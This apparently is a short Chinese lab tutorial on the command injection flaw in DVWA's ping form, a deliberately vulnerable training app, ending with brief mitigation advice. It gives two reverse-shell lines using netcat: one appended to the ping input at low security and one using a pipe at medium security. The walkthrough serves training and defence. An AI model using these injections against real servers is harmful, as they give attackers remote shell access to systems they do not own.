Dvwa漏洞之代码执行漏洞
代码执行漏洞 code execution允许攻击者执行操作系统命令windows or linux可以用来得到一个反向shell或者使用wget上传文件
·
目录
代码执行漏洞的危害 code execution
- 允许攻击者执行操作系统命令
- windows or linux
- 可以用来得到一个反向shell
- 或者使用wget上传文件
看个例子:security 为low
正常输入ip 用来执行ping,但是可以加个pwd,就把路径显示出来了,从而获取了目标服务器的pwd信息工作目录。就是说可以执行任何命令,很多命令可以获取反向连接
例如可以输入以下命令,在攻击服务器上就可以获取目标机器的所有权限
nc -e /bin/sh 10.0.2.15 8080
当security 为medium时
以上不再有空,此时考虑通过管道的方式。此时不执行ping xxx,只执行了pwd
同样的,可以通过构造以下命令,来获得目标服务器的访问权限
10.0.2.15 |nc -e /bin/bash 10.0.2.15 8080
如何规避此类问题
以上,我们看到 利用此类漏洞,攻击者可以在目标服务器上执行命令。
1. 不使用危险的功能
2. 在执行前过滤用户输入。我们希望用户只输入ip,不希望输入其他命令,那么可以考虑用正则表达式去检查。
来看下在security 为high模式下的代码。做了输入检查
以上!
更多推荐
已为社区贡献1条内容
所有评论(0)